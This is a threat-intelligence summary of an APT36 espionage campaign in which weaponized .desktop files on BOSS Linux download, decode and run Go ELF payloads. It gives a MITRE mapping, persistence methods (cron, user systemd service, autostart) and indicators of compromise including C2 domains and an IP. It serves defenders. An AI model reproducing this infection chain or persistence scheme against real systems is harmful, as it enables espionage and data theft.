Threat Research

APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

Cyfirma
APT36: Targets Indian BOSS Linux Systems with Weaponized AutoStart Files

CYFIRMA reports an APT36 campaign using weaponized .desktop shortcut files to deliver GO-written ELF payloads targeting BOSS Linux systems, enabling covert download, execution, persistence, and C2 communication with domains like securestore[.]cv and modgovindia[.]space. The operation leverages spear-phishing archives and tailored delivery to Indian government targets, resulting in data exfiltration and persistent access. #APT36 #securestore.cv #modgovindia.space

Keypoints

  • APT36 (Transparent Tribe) is conducting a targeted cyber-espionage campaign against Indian government entities using spear-phishing with archive attachments.
  • Attackers weaponize .desktop shortcut files (e.g., Meeting_Ltr_ID1543ops.pdf.desktop) that chain bash commands to download, decode (xxd -r -p), make executable (chmod +x), and run ELF payloads.
  • Malware is written in Go, delivered as ELF 64-bit binaries (e.g., Meeting_Ltr_ID1543ops.pdf-.elf) and exhibits unusual ELF header and section anomalies indicative of packing/obfuscation.
  • Malicious infrastructure includes recently registered domains securestore[.]cv and modgovindia[.]space (resolving to 45[.]141[.]58[.]199) used for hosting/downloads and C2 communications over non-standard ports.
  • Persistence mechanisms include user-level systemd service enablement, cron job pointing to .config/systemd/systemd-update, and autostart via X-GNOME-Autostart-enabled in .desktop files.
  • Observed behaviors include DNS-based C2 queries, non-blocking UDP sockets, epoll usage, futex synchronization, and attempts to exfiltrate harvested data to attacker infrastructure.
  • Mitigations recommended: email/security hardening, disabling .desktop execution from untrusted sources, EDR for Linux, DNS/outbound monitoring, IOC/YARA integration, and user training.

MITRE Techniques

  • [T1064] Scripting – Used via .desktop Exec= bash -c chaining to run download/decoding/execution commands: “the Exec field launches a Bash shell using bash -c, allowing several commands to be chained in a single line.”
  • [T1053] Scheduled Task/Job – Persistence and task scheduling implemented through cron jobs that execute ‘.config/systemd/systemd-update’ on reboot: “inserting a cron job that executes the hidden payload ‘.config/systemd/systemd-update’ on every system reboot.”
  • [T1222] File and Directory Permissions Modification – The payload uses chmod +x to modify file permissions and enable execution: “the script uses chmod +x to make the temporary file executable.”
  • [T1014] Rootkit – ELF file exhibits suspicious header/section manipulation and large NOBITS sections suggestive of rootkit-like hiding or tampering: “section headers are suspicious due to missing section names… Large NOBITS sections… used to load hidden data at runtime.”
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – Malware creates hidden payload locations such as ‘.config/systemd/systemd-update’ and uses hidden filenames under /tmp: “a temporary filename inside /tmp… the hidden payload ‘.config/systemd/systemd-update’.”
  • [T1037] Boot or Logon Initialization Scripts – .desktop autostart and enabling system-update.service ensure execution at user login: “Enabling X-GNOME-Autostart-enabled=true ensures that the file automatically runs every time the user logs in.”
  • [T1546.004] Event Triggered Execution: Unix Shell Configuration Modification – Use of autostart and user-level service changes to trigger execution on login/systemd sessions: “the malware enables the system-update.service for the current user, ensuring it is automatically started during future user-level systemd sessions.”
  • [T1543.002] Create or Modify System Process: Systemd Service – Malware enables/modifies a user-level systemd service (system-update.service) for persistence: “the malware enables the system-update.service for the current user.”
  • [T1003.001] OS Credential Dumping: LSASS Memory – Credential access category listed in mapping (article maps credential access techniques like OS credential dumping) though not deeply detailed in dynamic trace: “Credential Access T1003.001 OS Credential Dumping: LSASS Memory” (mapping entry).
  • [T1082] System Information Discovery – Malware performs system information discovery as part of reconnaissance and target profiling: “Discovery T1082 System Information Discovery” (mapping entry).
  • [T1083] File and Directory Discovery – Malware enumerates files/directories to locate data for collection: “Discovery T1083 File and Directory Discovery” (mapping entry).
  • [T1005] Data from Local System – Collection of local files for exfiltration is observed in the campaign behavior: “Collection T1005 Data from Local System” (mapping entry).
  • [T1105] Ingress Tool Transfer – Secondary payloads are downloaded from attacker-controlled domains to the host: “the script silently retrieves a hex-encoded file… from an attacker-controlled server.”
  • [T1571] Non-Standard Port – C2 communications occur over port 4000 rather than standard service ports: “modgovindia[.]space:4000… C2 communication… over port 4000.”
  • [T1001.001] Data Obfuscation: Junk Data – Hex encoding of payload (Mt_dated_29.txt) and conversion via xxd -r -p to hide binary content: “silently retrieves a hex-encoded file… piped through xxd -r -p, which converts the hexadecimal text into raw binary form.”
  • [T1095] Non-Application Layer Protocol – Use of low-level socket operations, UDP and custom DNS queries for C2 communications: “creates a non-blocking UDP socket… connects to the local DNS resolver at 127.0.0.53:53… sends DNS queries… for the suspicious domain modgovindia[.]space.”
  • [T1071] Application Layer Protocol – Malware uses application-layer protocols (HTTP) for C2 and downloads: “presence of ‘http://modgovindia[.]space:4000’ as both a string and a hex value in the malware file indicates a hardcoded command-and-control (C2) server address.”
  • [T1090] Proxy – Use of DNS and non-standard network techniques to obscure C2 routing and communication (mapping lists proxy behaviors in network techniques): “DNS-based reconnaissance or communication with a malicious server as part of a C2 infrastructure.”
  • [T1048] Exfiltration Over Alternative Protocol – Data exfiltration attempts over non-standard or alternative channels indicated by observed C2 and transport techniques: “The malware attempts to transmit harvested data to the attacker’s infrastructure.”
  • [T1498] Network Denial of Service – Impact mapping lists network denial techniques as a possible impact of the campaign: “Impact T1498 Network Denial of Service” (mapping entry).

Indicators of Compromise

  • [File Hash – SHA256] Malicious ELF and artifacts – 508a2bcaa4c511f7db2d4491bb76effaa7231d66110c28632b95c77be40ea6b1, 8f8da8861c368e74b9b5c1c59e64ef00690c5eff4a95e1b4fcf386973895bef1 (additional hash: e689afee5f7bdbd…)
  • [MD5 Hash] Identified payload filenames – Meeting_Ltr_ID1543ops.pdf.desktop “10b7139952e3daae8f9d7ee407696ccf”, Meeting_Ltr_ID1543ops.pdf-.elf “5bfeeae3cc9386513dc7c301c61e67a7”
  • [Domain] Malicious hosting/C2 – securestore[.]cv (used to host/download .desktop-associated files), modgovindia[.]space (hardcoded C2 and flagged malicious)
  • [IP Address] C2 server hosting – 45[.]141[.]58[.]199 (observed resolving modgovindia[.]space; monitor/ block as appropriate)
  • [Filenames] Weaponized filenames and archives – Meeting_Notice_Ltr_ID1543ops.pdf_.zip, Meeting_Ltr_ID1543ops.pdf.desktop, Meeting_Ltr_ID1543ops.pdf-.elf

Read more: https://www.cyfirma.com/research/apt36-targets-indian-boss-linux-systems-with-weaponized-autostart-files/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint